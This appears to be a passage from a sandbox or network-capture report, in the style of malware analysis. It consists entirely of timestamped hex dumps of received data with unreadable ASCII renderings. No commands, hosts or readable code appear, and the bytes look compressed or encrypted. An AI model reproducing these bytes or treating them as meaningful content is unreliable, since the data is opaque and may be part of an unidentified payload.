                                                                                                                                                  2022-11-15 17:54:38 UTC4687INData Raw: 18 1d 02 4b 76 fb db 69 27 53 7d 1d 1d 2f 6c 86 9d 55 09 37 f5 db 12 44 29 34 ba a3 c5 4a f5 71 f8 92 95 4e 75 bb ce d8 4b af 93 fe 2c ec ee b7 76 81 d0 e3 52 68 3b ba 68 70 4c d2 b9 09 31 c1 66 5f 4e 3e 24 63 82 13 ba 57 82 f9 cc 1f 5c 25 63 85 ea 82 80 0e 61 51 fe 37 d1 48 11 06 4b 94 88 58 21 10 34 12 39 10 d1 e8 04 45 ac 92 a2 80 f9 62 5a 0b 5a 08 a8 0e b1 64 4e 6f 74 17 c0 b6 66 62 17 0b 0e b6 85 13 27 68 4f 02 2a 0b 48 ff ec 57 b2 65 00 8f b3 41 68 a1 0c 0d 30 9d f9 1a 82 b9 eb 07 12 89 b0 75 b1 a4 e9 ca 75 7c 1d 63 1d 9d ea 4a 55 47 59 02 79 71 ad 55 ec a1 09 48 74 9a 1f 55 b4 cc 97 dd 95 b5 2c d4 e2 e9 97 7f e5 c4 a5 d1 0f da 77 7e 04 7c aa ed f7 cf 26 ad 75 3e 84 95 fe 47 81 68 54 ba c9 7b 6c eb c1 3b 31 af 43 a7 64 5d 95 72 a7 7f cf 79 25 75 16
                                                                                                                                                  Data Ascii: Kvi'S}/lU7D)4JqNuK,vRh;hpL1f_N>$cW\%caQ7HKX!49EbZZdNotfb'hO*HWeAh0uu|cJUGYyqUHtU,w~|&u>GhT{l;1Cd]ry%u
                                                                                                                                                  2022-11-15 17:54:38 UTC4703INData Raw: 54 7d 53 b7 54 70 f2 ff 47 30 1b a6 b5 aa c7 77 62 79 56 7a 66 b5 58 fe 03 e9 2a dd a2 2a 8c 0e 2b bf e0 6f c3 c4 c9 44 51 7d 48 33 58 32 7b f1 03 eb 17 a6 be 33 72 85 bf 28 6e e5 65 2f 44 18 ab 65 da cc 54 31 40 97 43 41 56 7a f0 58 a9 80 e6 34 3c 20 e3 e0 d3 f5 54 af dc c3 60 64 4f 51 bd eb a6 54 97 e8 81 20 d9 00 6f e6 b0 27 1d 1f 3a 1a c0 50 e2 d2 e3 e4 ac 4f 68 fe 53 21 b5 0b 6e ad 9f b0 68 34 65 25 98 2a 20 13 47 33 8a 58 8b c0 b6 03 6b 9f dc 6b 69 fd 95 76 ad f9 bd 4c 63 53 c1 2c ab e8 65 49 26 7a 2d 34 dd b4 60 b3 4c 09 54 59 5f 71 7d 72 fb d9 a4 3d 00 92 76 b3 7e 47 81 04 cf 9f b9 fb 63 ee 82 6c df 40 90 32 fd 24 66 7f e9 02 ce fc 62 ff 77 db 7d 2f d1 1f da 75 e7 07 49 d4 7e 52 17 1e 9f e9 0b d2 c9 40 ae 37 1d ce 30 ad 00 d7 3a 45 5d 5c e7 9f 14
                                                                                                                                                  Data Ascii: T}STpG0wbyVzfX**+oDQ}H3X2{3r(ne/DeT1@CAVzX4< T`dOQT o':POhS!nh4e%* G3XkkivLcS,eI&z-4`LTY_q}r=v~Gcl@2$fbw}/uI~R@70:E]\
                                                                                                                                                  2022-11-15 17:54:38 UTC4719INData Raw: 42 93 58 02 ed 57 de 28 44 fd 28 7b 40 01 bb 52 27 c8 10 a9 fd 4f b3 52 18 db 95 a0 19 7a cb 08 74 5d 1a b6 55 80 29 98 21 9b 93 a1 64 8f e7 b4 45 52 49 ea a7 cb 82 d7 8d ff 15 89 cf 8d d1 a9 59 6a 7a 12 ca ff a6 33 a1 28 a7 a5 84 ff 45 33 0d e9 56 a3 3a f8 24 d7 bf 3a 2a 25 51 db d1 49 74 f3 d2 7f 89 cd 75 c5 6b cd 08 7e 13 35 ec 1b f0 53 bb ec 18 17 be 75 aa 18 e8 2a 41 8a 1a 12 29 df 5b ae 8b 21 6e 08 f3 e8 63 2b a6 88 a5 fb c6 e1 5d 5b 3c d0 89 14 9f 67 9e 3f 05 d3 20 52 0a fa 9e 74 4a ae 2c a0 b8 88 68 c0 1a 19 2d 6c 47 f7 34 02 97 79 3f e4 50 a8 44 f4 bf 9f cd 05 68 0c 85 19 fa 96 3a 43 97 dc d3 f9 42 ba bd 96 e5 5e 57 a6 eb d1 fc ae 2e 8c 36 27 7c 1c 9e 25 dc 67 5e cc 50 f6 4e de 28 dd 9d ae c6 25 c4 ab 95 7c eb f1 bd 65 49 3a ec 43 16 55 d3 f4 52
                                                                                                                                                  Data Ascii: BXW(D({@R'ORzt]U)!dERIYjz3(E3V:$:*%QItuk~5Su*A)[!nc+][<g? RtJ,h-lG4y?PDh:CB^W.6'|%g^PN(%|eI:CUR
                                                                                                                                                  2022-11-15 17:54:38 UTC4735INData Raw: 93 96 aa 20 c1 b3 74 7f 4e 6d bc 7e 63 06 06 81 b0 e5 fe da e1 6a b2 c1 d7 e4 de eb 12 aa 92 11 ab 68 0a 68 0b 36 79 d5 4f 7c 73 74 97 65 f7 a4 ef 69 ab 82 fd e5 19 4b 74 0d 5a d5 cd 82 6b 76 09 56 22 49 ff 2d 15 96 75 1c ff 11 fb 9d fd d2 2a d4 13 96 22 fb 3c 3e ce 86 97 d6 bc c4 8e aa a2 16 c6 46 f5 84 17 42 9e fe ee 28 78 dc 4b 8d af 28 c4 b0 e6 70 b4 8a c1 ce b6 02 c2 02 9a bb 74 f2 58 7a ac f9 3a ae 6c 66 33 ff 02 3a d7 66 27 40 21 7d 02 cc cf a9 dd b2 fd 7c 26 52 d6 98 87 cd e8 d3 cc 78 66 5a cb fa 0f 9c b6 b7 ee 8c fe b3 ea 80 2d db 65 38 f2 03 25 45 fe 83 40 84 32 65 ae 12 78 80 b6 a3 dd 3f b3 a7 fe 5f c6 01 9f e9 50 75 e3 ef e8 20 74 4f ec aa 53 86 b9 28 05 47 06 75 7a 90 60 22 90 f5 2d 48 56 96 54 21 41 80 49 da 6a 42 9b 10 f8 9f 4a f9 6d 08 67
                                                                                                                                                  Data Ascii: tNm~cjhh6yO|steiKtZkvV"I-u*"<>FB(xK(ptXz:lf3:f'@!}|&RxfZ-e8%E@2ex?_Pu tOS(Guz`"-HVT!AIjBJmg
                                                                                                                                                  2022-11-15 17:54:38 UTC4751INData Raw: 18 73 2a 63 65 58 ed ea 94 e1 21 50 a6 ef 00 cb 34 fe 9d 34 a3 61 6a 15 d5 84 fe 6a 38 d7 88 9d d9 0f c2 76 a2 4c 54 8a e6 d6 5b 53 ca 02 00 fa b1 a0 6b fa 20 9c b4 01 56 68 97 b6 f0 3e a8 01 27 55 dd 1e 47 05 68 73 a8 3c 2a b8 49 82 32 8f 3d 77 d1 3d c9 77 ed e3 2d b1 52 f3 02 1c 1a 55 7c e2 72 5f 67 6a 3d 4e eb 8b f9 a5 bf 2b 3f 93 aa f3 ef 98 12 74 4b 00 ed 75 81 f1 d8 e5 e9 7d bd 6b a0 a1 54 45 fd df 2e e2 8d d6 ef cb 50 92 b6 bf 09 9c 5b c8 e4 b0 9c a2 5a f7 6f c3 2d c4 17 12 68 79 4a eb 9e e0 4e fa da 34 4e aa df 96 4e fe ca 52 2d 57 46 0e f8 df 5a 5b f1 9f 2e e2 8b b4 fa a2 ec a5 39 06 6b ec 67 bd 7f a9 74 b2 14 a9 06 7f ee 6d 95 f4 28 5c 5a 50 d0 50 ab 15 bb 4f 2f 65 d1 af e6 97 82 9a da c9 77 31 2f 6d 3e e0 ab 22 02 90 f6 06 5a fd df c8 72 c2 96
                                                                                                                                                  Data Ascii: s*ceX!P44ajj8vLT[Sk Vh>'UGhs<*I2=w=w-RU|r_gj=N+?tKu}kTE.P[Zo-hyJN4NNR-WFZ[.9kgtm(\ZPPO/ew1/m>"Zr
                                                                                                                                                  2022-11-15 17:54:38 UTC4767INData Raw: 5e 40 1e 2b 52 dc 06 f6 7e 61 15 24 80 6e 54 49 7a 64 25 f0 48 7b c8 b1 04 98 77 2e 31 58 85 43 00 f8 7a 2f 12 cc 19 b2 eb ca cd 17 59 61 25 ec a9 7e 4c ef 11 5f b4 04 e1 1d 32 63 eb 30 28 73 3e 52 83 a8 fd d5 88 a1 0f c4 2e 04 d2 07 8f fb e6 3d 0c f8 4a cc 21 35 01 d9 2d 75 9a 27 61 fc 34 8c 79 28 d3 f8 b8 0a f9 fb 18 f7 98 1e 2f 89 ae b6 fc 32 96 42 b0 62 18 b7 7e 1b 65 c6 94 18 bb ed 73 8f e2 19 a0 d3 33 fc 07 d1 24 74 e4 0b 57 ee 43 32 0a bc 18 ea f7 12 ee 60 94 04 25 cb 60 a0 75 89 68 5d 6c 59 09 a2 e9 ea 0d 7c 04 63 ef f1 9b 37 85 ee 28 4a 4a 00 2c 8b 27 03 d2 1c 81 dd 40 36 89 00 73 66 54 a2 f3 a0 8f d8 4a 1e bc 94 b7 14 67 13 e9 36 c6 a6 f0 f1 25 49 44 e3 1c b0 17 54 37 de 0c 01 6b 9a ec d2 e5 41 4c bd eb 09 8c 10 3e 0a 2c 3a 01 9a 70 09 65 44 dc
                                                                                                                                                  Data Ascii: ^@+R~a$nTIzd%H{w.1XCz/Ya%~L_2c0(s>R.=J!5-u'a4y(/2Bb~es3$tWC2`%`uh]lY|c7(JJ,'@6sfTJg6%IDT7kAL>,:peD
                                                                                                                                                  2022-11-15 17:54:38 UTC4783INData Raw: 94 87 5e 68 0b 7f ef 2e 9a 14 62 0c b3 59 1d 25 13 0e da 80 40 d3 81 42 39 01 94 2d 19 82 de d2 20 c4 14 16 eb fe ef e0 c2 6b 0a 54 8d 48 16 b9 13 2b aa 30 54 83 94 fc a8 c8 16 3e c2 0c e3 42 d6 c0 31 3b a8 bf 76 51 13 13 c7 06 99 64 a2 15 ae c4 28 fe 2d 1f de 44 cb 73 94 e2 90 7c 09 5f 79 47 04 57 40 74 41 07 e2 32 ab 3f 43 de 02 97 a6 df 4e 04 dc 78 13 ef 8a 08 4e b3 5e cb 96 f4 73 27 d5 cf 7b 0b 76 9b 53 5e 88 49 f4 09 28 d9 7f ba 18 5d e6 fa e2 75 c7 5c a6 2b 09 7d 32 fa 7d 18 fa be 75 97 e6 8a 2d 51 bc dd 9c a4 25 42 ee a0 9a 17 d7 4f f3 c7 8c 9a 8d f9 fd 66 d8 17 c8 c5 e2 a0 74 af 9d 64 06 00 ad e5 47 73 4c e9 9a d6 30 2c 92 3c 63 75 cb 05 5a a6 d0 0a 67 23 0a ac d1 26 7b 80 4c 78 d3 41 49 57 17 38 70 44 5a 38 4c 50 4f 4c 9c 10 e0 50 d6 da 2f 04 6c
                                                                                                                                                  Data Ascii: ^h.bY%@B9- kTH+0T>B1;vQd(-Ds|_yGW@tA2?CNxN^s'{vS^I(]u\+}2}u-Q%BOftdGsL0,<cuZg#&{LxAIW8pDZ8LPOLP/l
                                                                                                                                                  2022-11-15 17:54:38 UTC4799INData Raw: bb 9e 7c 9a bd 75 ed f4 69 a9 07 dd d3 4e 80 98 08 bb 7e c1 ea 1c 03 f7 d2 8e da 81 e1 d4 75 fc 67 d8 f2 44 7b eb 50 a7 e7 c7 12 b4 58 7b ee 50 b3 08 4b ac 81 a1 e0 50 0b 8b 1f 76 6f 25 d6 81 d6 10 9e 7b ff f0 b8 b9 87 00 ba da 2b 6e bb 86 3b 71 f6 0c 64 dd 34 23 ed 56 8f a0 7e 6f 65 da 02 b1 a3 0d 7d 85 ad 0b ef 61 59 ee 49 02 be 18 a4 c4 97 f3 60 e2 fe e1 7d f9 58 50 ec fd b7 9e 1c 38 e4 ac 4a aa cd d4 2e cc ee ba 2f 97 01 95 88 08 66 13 08 dc a6 13 9b 34 04 bb f2 4a 72 61 36 20 84 6b fa ad 0d 76 e6 12 58 9c 6b 46 00 0c 76 06 07 b2 eb ad 9f f1 2a be 78 c0 90 2d 17 9a 42 18 55 74 cc f0 c8 9c 5e 01 af 7c 40 c0 c0 29 7d 13 46 89 d1 2f 28 82 09 a5 7c 66 9d 95 cc da 9f 48 08 09 2e 02 bc 2c db 5c 13 31 f1 d6 2a f3 b2 cd 46 20 1c d0 f7 5b 08 a8 3a b2 0e 57 0b
                                                                                                                                                  Data Ascii: |uiN~ugD{PX{PKPvo%{+n;qd4#V~oe}aYI`}XP8J./f4Jra6 kvXkFv*x-BUt^|@)}F/(|fH.,\1*F [:W
                                                                                                                                                  2022-11-15 17:54:38 UTC4815INData Raw: d9 cf 87 98 3d 8d 0b 57 c7 bb 92 fe ac 45 a4 aa 33 9d 24 13 21 07 ff 28 7c 3a 0f f8 cb bd 56 f7 56 5e b2 95 25 ee 55 20 f3 dc 1d 60 9e 82 c0 6a c3 20 00 9f 55 db 12 a7 86 d0 7e 2f 67 8e be 8a 35 d8 49 de 98 c0 17 9a 4c 69 25 09 f7 e4 a5 02 bf 41 61 bc 5d 95 5d 71 e9 42 f7 78 55 6e 43 00 05 c5 7f 6b c3 71 2e f7 72 66 0b da bb e0 9b 57 98 1f 0d 58 81 1b ad 09 7d 92 5d 48 66 4c a8 60 42 b0 dd 23 f5 4a 33 59 75 70 7c a3 83 f4 05 3c 3b 06 ba ef ec 2c 27 2a 7a 21 13 d2 d0 03 41 be 3a ca 7a b6 d5 04 aa c4 5f 7b ae e2 d9 94 30 2a 86 ca 30 5d c8 24 4a cb 0c 01 82 d3 d7 5c c9 8b 96 33 26 87 a8 87 09 7f 45 c5 a5 f7 c4 cf 27 bd ab 6e 50 20 b3 54 03 18 eb a2 01 96 9b 20 24 6a c4 d5 0c 56 e2 7d 04 05 93 a1 81 aa f2 e7 2b 17 11 08 54 1e 0f 14 5e c2 0b d6 18 f6 67 97 55
                                                                                                                                                  Data Ascii: =WE3$!(|:VV^%U `j U~/g5ILi%Aa]]qBxUnCkq.rfWX}]HfL`B#J3Yup|<;,'*z!A:z_{0*0]$J\3&E'nP T $jV}+T^gU
                                                                                                                                                  2022-11-15 17:54:38 UTC4831INData Raw: 95 48 a9 81 e1 44 cb 1e 6b fc 4f a5 af e2 2f a6 90 b5 53 94 49 ff 34 cd 0b e9 f2 71 c6 d9 06 c1 65 76 fe 1d 89 04 86 0b 7f a2 4c e2 8a f9 68 a7 77 11 96 26 6c 51 0d 01 57 28 0d 3b af 12 be f8 c8 a9 2a 00 36 05 0a 39 23 59 09 62 81 16 77 70 8c 18 3e e1 67 0d 02 6b b7 16 05 2f a6 0e 64 8e 4b 01 b6 76 89 14 7f 14 fe 97 44 36 54 4f 84 1e 95 d1 90 4b 66 9a 31 4b 85 48 04 93 c2 d7 59 fe a5 5e a4 62 02 b7 02 f8 85 f5 4e 2b 9c 02 85 4c 14 52 a9 cb 70 31 6a 54 0d 01 42 fa 77 18 29 08 57 c7 1c f0 30 09 fd e6 4f 04 e2 46 a2 5b d4 f8 7a 09 9c 1e 60 98 27 a6 6f 5a fe e6 52 00 ad c4 01 49 27 e0 1f 18 45 c3 60 84 c8 37 c7 e0 1a 9a 44 44 bb 31 86 dd 9b 89 60 a9 01 c9 e0 c0 98 1e 08 18 e7 f7 73 fe c0 60 ce da 3a af 97 17 15 bd ea df 00 01 fb 3a fd ff ce 6d 2b e6 d6 a2 df
                                                                                                                                                  Data Ascii: HDkO/SI4qevLhw&lQW(;*69#Ybwp>gk/dKvD6TOKf1KHY^bN+LRp1jTBw)W0OF[z`'oZRI'E`7DD1`s`::m+
                                                                                                                                                  2022-11-15 17:54:38 UTC4847INData Raw: 80 0a d7 a5 2b 77 aa bc 00 1f d2 6e e8 42 07 c8 00 03 f1 ac 48 99 e6 c4 c7 af 13 22 eb 3c 54 8a 48 0f 5e b9 ca 58 e0 2e cc 87 f6 ad 7d a2 e4 34 82 f3 8c 69 8d fa 20 79 6c f4 fd c2 04 f7 af 4b f8 27 44 3d 21 ce e4 d9 fe 2e 8b 7c 00 29 ba 9d 83 03 cb c4 3f e5 ab 0b a7 02 5e 24 9e fa ff 99 f4 d2 7d 85 b6 10 a2 8e 12 14 c5 bd 7c 3e 72 40 3f 0c f3 b8 17 42 e9 e4 18 f2 40 0f 48 31 c8 5b ae c0 06 c0 90 1d 92 04 fc 36 b5 dc 30 c0 fe ed 09 82 00 3d 10 0c 5c 6a db fb 58 09 7b 8d 7d 79 30 a8 04 a2 c9 38 72 f0 a7 4f 80 8e 6c 10 a7 01 13 2c 26 28 84 df 61 94 3c ea 75 17 88 99 c6 52 04 40 54 fe 40 6c ae 10 82 c3 61 47 5c 0f fb 78 de 60 16 7e a9 b5 66 9c 4b 9e c1 de 81 80 84 08 4f dc 0e ac 10 a1 f6 a3 03 98 8d 8a ac 04 23 75 26 e9 d1 52 4b b2 81 25 b8 56 a1 18 c2 24 ac
                                                                                                                                                  Data Ascii: +wnBH"<TH^X.}4i ylK'D=!.|)?^$}|>r@?B@H1[60=\jX{}y08rOl,&(a<uR@T@laG\x`~fKO#u&RK%V$
                                                                                                                                                  2022-11-15 17:54:38 UTC4863INData Raw: 4f 53 b3 1b 06 58 3f 4d 48 e6 b0 09 54 71 d5 77 1c 6c 5b ef 84 a5 aa 70 f5 a0 85 19 00 4a 49 38 a8 f9 43 c0 65 26 91 f1 cc 13 62 f0 70 83 18 85 02 45 c2 41 03 27 d7 2c 81 00 86 06 a1 ad 1b 5c 17 64 25 ec 4f 1c 04 0c 2f 5d 9b 47 24 f0 fd e1 a6 b2 26 77 40 39 e5 02 80 0b b2 fc 48 36 f1 fd ba a0 21 84 0a 45 c5 41 9d df 07 2e 46 d9 e9 e3 9c 01 fa cd 81 a5 2a 8d cf 74 c2 39 9f 7c 8f cf 23 60 55 c6 0d 1b e3 84 8e d0 7a a2 0b a1 4f c4 01 f4 9a 3d 0e b3 2f 12 29 a1 f4 f9 8b d0 e6 12 57 d5 af a2 35 8f a7 32 af e2 1d 8d 87 19 2a fb 65 1d 80 76 a0 ee 03 e1 00 8f 16 02 e1 23 42 84 40 a2 28 3b 5b 54 ad db 10 f0 56 13 11 35 fe ce eb 4f f8 5d f1 d1 60 3b fd cb 86 4d 29 5c 77 47 c9 1c 60 dd 1c 55 5e b1 ae 3d a7 2e b3 60 89 d3 fb 23 a5 55 01 63 28 4b f7 28 4a 70 01 19 6f
                                                                                                                                                  Data Ascii: OSX?MHTqwl[pJI8Ce&bpEA',\d%O/]G$&w@9H6!EA.F*t9|#`UzO=/)W52*ev#B@(;[TV5O]`;M)\wG`U^=.`#Uc(K(Jpo
                                                                                                                                                  2022-11-15 17:54:38 UTC4879INData Raw: ac 02 d1 50 cb 0b a4 57 67 88 c3 c7 a7 27 50 8f 74 fe d4 28 fb 53 d5 2b 03 ee 1e 00 c3 b4 ed 9c e5 f7 02 1c 19 5e 4b fc 62 75 c6 06 bd fc 3a 51 6a 28 56 4b be 78 16 62 c2 29 fa cc 01 f6 48 50 5e 49 9f 96 9c 32 dc 32 38 37 f7 03 22 fc 39 01 10 90 49 a3 ed 06 4d 01 e3 dd 7e f2 19 c6 86 34 31 0a 92 fb a8 4b 56 8f bf f0 c9 a9 a6 92 88 28 00 0b 06 9c 90 bd 01 de eb 95 ee 5d 31 28 9e a8 3a d1 66 2c 00 fe a6 bc 1f 17 45 d7 1a f0 74 3e 28 fd c6 d9 11 96 7e 73 00 53 e6 41 77 2d 13 8c 4f 37 fb 7a 7a 08 8a fc 01 e9 5d 44 e8 fe 48 a9 ae 02 a7 e4 dd 9c ab 20 8c 01 27 a6 cf f6 d2 e0 3b 1c 58 84 28 97 f4 1a 6b 7e 29 54 d2 68 28 51 86 71 1e 3d 50 82 b6 dd 74 6e 07 13 28 76 03 94 34 ef 34 00 f8 c4 84 86 05 08 ae 62 a6 e4 73 68 e5 76 f8 3e 4f fe 78 3a b6 2d aa 02 f1 c6 50
                                                                                                                                                  Data Ascii: PWg'Pt(S+^Kbu:Qj(VKxb)HP^I2287"9IM~41KV(]1(:f,Et>(~sSAw-O7zz]DH ';X(k~)Th(Qq=Ptn(v44bshv>Ox:-P
                                                                                                                                                  2022-11-15 17:54:38 UTC4895INData Raw: 08 5b 98 0d 0c 6f 05 27 21 07 99 21 20 69 04 3f 36 db f7 0a c4 e8 cf 80 d3 a4 4c 4e 00 23 f6 70 ae 37 a7 c2 b1 48 3a b6 85 7c 68 ab b5 97 e8 93 e2 4a f1 8c 08 d9 7c 30 a0 11 21 93 2c 8c b6 91 82 95 5d 04 3d c1 7f f6 a6 93 2e 04 58 40 0d e8 7c d4 98 13 c9 4a fc eb a4 fe 64 31 ff a6 0f d3 ac 0e 89 2b 86 93 63 50 9d e7 b1 c6 e9 11 e0 52 b5 d1 44 5a 7f b2 3b 77 e5 fa e2 5c 53 7d e5 0b 2f f9 f4 59 b1 28 87 5e a2 d0 b6 6c 9d 4d cc a5 74 b0 68 9c 82 bb b9 7d 6a d5 14 46 d3 2d 9e 24 63 2b e9 5f 75 a5 38 ae a9 5b 2a 8c 04 63 d7 fe ff 0b 6e 67 aa c1 72 23 01 11 82 7d 18 a3 97 e0 b2 fb 8d 70 7a 89 9b ea 06 1a 1f 3f 01 58 90 ef 08 10 d1 46 4a 8c 54 b4 42 01 3b 7e c0 18 c0 15 53 0f e8 de bd f6 f7 70 cb bf 4c 63 34 68 1d a8 ac 10 f0 aa 18 04 86 3f ce be cb bf 71 d8 09
                                                                                                                                                  Data Ascii: [o'!! i?6LN#p7H:|hJ|0!,]=.X@|Jd1+cPRDZ;w\S}/Y(^lMth}jF-$c+_u8[*cngr#}pz?XFJTB;~SpLc4h?q
                                                                                                                                                  2022-11-15 17:54:38 UTC4911INData Raw: 43 08 b5 4f 24 fa 2c a4 af bd 74 82 72 5d 79 5c 09 e2 16 f5 1e 65 b5 1e 6a 30 5e 53 34 2c fa d6 00 e9 19 3e a7 b0 2a 36 b9 61 7e 44 8a f5 fe 6c c8 9f 58 c2 34 2a 7a 38 32 b3 80 74 f1 c7 53 e2 dc b9 2d e4 ce 21 26 82 65 f8 ee 7d fb d6 0b 56 bc 21 2c 8c 6e 06 48 88 9d 0c 2e 97 4d 44 15 71 16 8f c8 d7 b0 ee 1a 9d d6 5e 43 52 6b 2a 24 2e e2 9d 57 09 8a 4e bc 20 24 a0 27 eb 6a 6e 7e cc d1 b6 18 3b 4c 04 d2 61 0d ea 5d c8 6b 2c 9c ec 23 2b 01 a5 dd ce e0 95 d7 95 f1 ae b6 25 76 3c fa 5f 78 4d 1c d0 33 6f 21 20 df 2d 54 5b d7 9e 2d f8 b2 08 6a 37 67 29 39 51 08 7a f1 64 22 84 cc 3c b7 06 12 30 7e 52 dd 88 6f ce dc 27 54 d1 30 8b 81 c7 55 c5 5d 45 55 ea b6 ac e4 38 20 68 5c a1 d5 25 1e e5 15 0b c5 58 1c 04 90 a0 97 4d 12 6c ed e9 13 ec f3 c3 b8 b3 a8 ac 2d b4 fc
                                                                                                                                                  Data Ascii: CO$,tr]y\ej0^S4,>*6a~DlX4*z82tS-!&e}V!,nH.MDq^CRk*$.WN $'jn~;La]k,#+%v<_xM3o! -T[-j7g)9Qzd"<0~Ro'T0U]EU8 h\%XMl-
                                                                                                                                                  2022-11-15 17:54:38 UTC4927INData Raw: 1d cd b1 69 c4 e6 e8 08 84 60 fe 05 56 dd ad e2 5e d1 0c d6 db 62 7d 27 a7 ff 9e e6 38 d6 7b 4b 8e 48 16 99 5c be 8a 06 38 4a e0 20 73 12 9a f8 1b 5b 6d 1b a2 83 a3 3f 09 fb 50 c0 f6 01 65 eb 23 b6 3b d5 ac ad 25 44 1c 16 ad e4 cd 42 a7 bf 5d 7d 55 e0 8c 4e 47 b1 41 50 c1 dd 59 fc 5f bc 78 f7 f3 14 29 9b af 1e 96 ff 04 76 18 45 a2 67 05 fa 97 1b 25 05 09 bf 56 ab 8c 4f 8e bf 50 74 f6 c9 b7 3a 76 84 d7 62 3c e2 38 f0 02 40 e0 00 6e c9 0a f6 ce b5 b2 83 12 29 fb d5 f3 ce 2d 30 82 af 96 77 8e f0 72 bb d1 4c 13 1c 2a ee 28 a0 48 9c ac 16 62 88 77 4c 03 e5 e9 78 35 ec ff aa b2 f4 52 3d 0c 3e fb d7 14 b0 8a 60 27 2c f0 c6 e0 7a ad 4c 02 8a cb e9 40 78 3a 65 ad 45 af ac 8e 13 97 78 6a cb 18 a0 bf 3c d3 7a 85 2f 55 b0 24 97 b6 44 e0 5e bf 0d 46 18 40 b4 92 11 eb
                                                                                                                                                  Data Ascii: i`V^b}'8{KH\8J s[m?Pe#;%DB]}UNGAPY_x)vEg%VOPt:vb<8@n)-0wrL*(HbwLx5R=>`',zL@x:eExj<z/U$D^F@
                                                                                                                                                  2022-11-15 17:54:38 UTC4943INData Raw: f6 1e 46 02 29 a4 64 bd 42 3c 65 f8 88 07 54 09 2e e6 d6 7c 44 55 01 bc 9f 94 d3 e7 06 45 d4 c5 73 c2 98 04 f6 5e 98 37 fe eb 28 38 89 73 4f 00 c9 6e 2f 59 de 1f 6f 1c 4e 35 e4 44 6a 1b ff d6 4e c1 e8 58 84 97 3e f4 ba 5f be 63 e0 c2 84 0b a4 62 4f 78 73 97 f6 e0 56 20 23 fd be 6a 63 b8 d9 13 b4 fa d6 eb f6 54 42 28 10 60 fe 1d f6 23 62 25 8b 01 7f 47 72 25 d0 94 bd e4 d6 97 55 96 82 9f fc 10 85 a2 80 18 be 20 a8 26 e0 73 9f 73 b8 64 55 41 9b 8f 87 6a 6f a9 ac d2 f8 76 4b ba 30 1d bc 6a d3 4a 1d fb 9e 71 5f ff 2b 27 5b fa 6f 53 5b ab 2a 63 60 85 57 68 66 eb 7f 77 0e 5f f7 d7 4f 2e 81 a1 93 14 88 a3 6e a3 42 8b 34 55 b6 e5 b7 cd 07 05 e9 66 11 fa c1 d0 9c 16 2a 04 bf 0c c7 ab 4b dc e6 a4 90 4a b2 1a 7c 62 f3 08 f8 64 dd cf 24 8b 8e 48 6e 10 20 6c a0 34 a6
                                                                                                                                                  Data Ascii: F)dB<eT.|DUEs^7(8sOn/YoN5DjNX>_cbOxsV #jcTB(`#b%Gr%U &ssdUAjovK0jJq_+'[oS[*c`Whfw_O.nB4Uf*KJ|bd$Hn l4
                                                                                                                                                  2022-11-15 17:54:38 UTC4959INData Raw: 23 ff cc 74 8c 61 2a 30 54 68 d3 c1 98 3c 0c 00 c5 a7 48 c2 34 9c 08 71 79 2f ba 9d dd 18 a4 8d 8a a0 09 71 49 00 74 35 ab 1c f2 58 36 f9 0c ea e8 b0 8e 50 60 9f d9 50 05 46 c5 8c fa 82 08 e4 75 7e ec 6e a0 b4 f4 3f 0e 20 5f 2d e6 6d 10 0f d8 12 4a 23 f4 ec 14 40 fe a9 75 89 f7 7f b9 58 87 e0 18 c9 56 ec 52 4c 78 4b 70 c1 56 8e 9f c2 5d f9 b6 a7 7d 44 d0 68 50 29 dc 44 49 f2 be 01 87 c5 36 03 a2 0b ff f9 f0 3d 48 c0 e2 19 e4 4a ba 88 15 3a 88 78 13 4d 27 1c 84 a0 e2 fd 92 ca 67 44 e6 98 29 2b ee dc 44 00 56 2e 19 43 a8 58 1a fe 3f 9e 91 75 4e 56 25 ee ef f9 5c 62 d2 ab 60 bc c3 d9 4f b4 00 f2 fa 6a 2d 3e d7 4e cc ab 2c a8 dc 84 27 94 15 98 c8 9a 16 5f 72 ec b9 81 74 96 56 4e 3b bd 08 92 b6 49 4e af 2c aa 81 e7 2e 2d 0e 7f f2 ce 0b d4 b8 60 d5 92 31 40 84
                                                                                                                                                  Data Ascii: #ta*0Th<H4qy/qIt5X6P`PFu~n? _-mJ#@uXVRLxKpV]}DhP)DI6=HJ:xM'gD)+DV.CX?uNV%\b`Oj->N,'_rtVN;IN,.-`1@
                                                                                                                                                  2022-11-15 17:54:38 UTC4975INData Raw: 33 15 ad 80 e1 de 71 02 49 d9 66 1b 57 9f 44 0e 94 a4 9e ab c8 7a e0 88 73 53 00 e6 c8 4d a7 86 60 ee 2f ea b7 7e 36 48 b5 1f 83 11 7d c5 f5 ea f7 49 02 c6 e6 9f 10 37 e2 e6 5c 37 17 b0 01 a1 03 4e 60 be 80 15 73 1c 9a f2 8e ae 31 1f cb 5a c9 1b 89 08 ca a8 7d 42 6b 82 63 bd 06 2f 61 fd 61 4c 02 c2 44 72 10 dd 79 b2 04 34 1d 4d aa 20 e5 47 c3 01 c9 be ca a9 ed 24 80 7b 2c e2 c3 23 4d fd b2 04 58 5d 71 75 89 d6 f8 05 3e e8 d1 9b 2d 33 6a d4 1d c8 d5 85 f7 71 cd 4a 56 84 73 ea ab ad e7 b8 c8 40 d7 55 ae 1e 32 6b e0 cc 76 ff 94 f9 09 af 4a b7 7f 53 69 ba 62 15 fb 03 ca 45 7d 10 9b 9f 21 05 35 15 0f 84 e5 af b1 ec 6f 96 b2 16 10 73 66 e8 3d 1a d0 cd 4b 18 96 86 9b 54 05 d4 06 42 15 f0 a1 84 15 09 dc 4e 3e c2 d5 60 60 8d ca 05 2f 51 e0 2d 0c f9 26 0b fc 26 34
                                                                                                                                                  Data Ascii: 3qIfWDzsSM`/~6H}I7\7N`s1Z}Bkc/aaLDry4M G${,#MX]qu>-3jqJVs@U2kvJSibE}!5osf=KTBN>``/Q-&&4
